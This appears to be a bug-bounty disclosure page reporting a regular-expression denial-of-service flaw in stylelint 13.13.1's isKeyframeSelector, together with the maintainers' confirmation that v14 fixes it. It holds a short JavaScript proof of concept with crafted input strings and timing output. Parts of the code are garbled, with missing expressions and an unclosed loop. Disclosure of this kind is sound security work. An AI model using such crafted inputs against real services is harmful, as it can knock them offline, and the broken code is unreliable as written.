Inefficient Regular Expression Complexity in stylelint/stylelint


Reported on

Oct 16th 2021


I would like to report a Regular Expression Denial of Service (ReDoS) vulnerability in stylelint.

It allows causing a denial of service when calling function isKeyframeSelector.

Proof of Concept

// PoC.js
var isKeyframeSelector = require("stylelint/lib/utils/isKeyframeSelector")

for(var i = 1; i <= 50000; i++) {
    var time =;
    var attack_str = '1'.repeat(i*10000)+"a";
    var time_cost = - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")

Check The Output

"attack_str.length: 10001: 290 ms"
"attack_str.length: 20001: 1072 ms"
"attack_str.length: 30001: 2047 ms"
"attack_str.length: 40001: 3640 ms"
"attack_str.length: 50001: 5688 ms"
"attack_str.length: 60001: 8237 ms"
Yeting Li
a year ago


@admin, please see the security policy

We have contacted a member of the stylelint team and are waiting to hear back a year ago
stylelint/stylelint maintainer
a year ago

Thanks for the report. Can you confirm if this is still an issue with the v14 branch as we recently updated a number of Regexes in it? If so, we welcome a pull request to the v14 branch.

Yeting Li
a year ago


Hi, @maintainer, I tested the latest version (i.e., v13.13.1) of stylelint released on npm. I just verified that this issue does not exist on the v14 branch.

stylelint/stylelint maintainer
a year ago

Thanks for checking the v14 branch. It's great news that the issue does not exist there. We hope to release version 14.0.0 of stylelint this week.

As such, do I mark this issue as invalid (or valid as the issue is in 13.13.1 but fixed)?

Yeting Li
a year ago


Hi @maintainer, you can mark this issue as valid and indicate the specific version (i.e., 13.13.1) of the issue. Thanks a lot!

stylelint/stylelint maintainer validated this vulnerability a year ago
Yeting Li has been awarded the disclosure bounty
The fix bounty is now up for grabs
stylelint/stylelint maintainer confirmed that a fix has been merged on 060310 a year ago
The fix bounty has been dropped
to join this conversation